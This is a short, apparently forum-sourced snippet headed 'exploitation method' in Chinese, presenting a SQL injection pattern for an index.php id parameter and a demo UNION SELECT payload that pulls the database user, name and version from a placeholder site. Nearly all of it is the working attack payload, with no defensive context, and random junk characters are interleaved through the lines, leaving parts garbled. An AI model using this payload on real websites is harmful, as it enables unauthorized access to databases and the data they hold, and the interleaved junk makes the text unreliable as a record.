利用方法:
: z$ V& d0 H2 N! N/ x0 `- n' { http://www.xxx.com/index.php?id=[SQL]' n1 i% p: g% ~
Demo:4 d" y" E7 w# f1 v% k
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |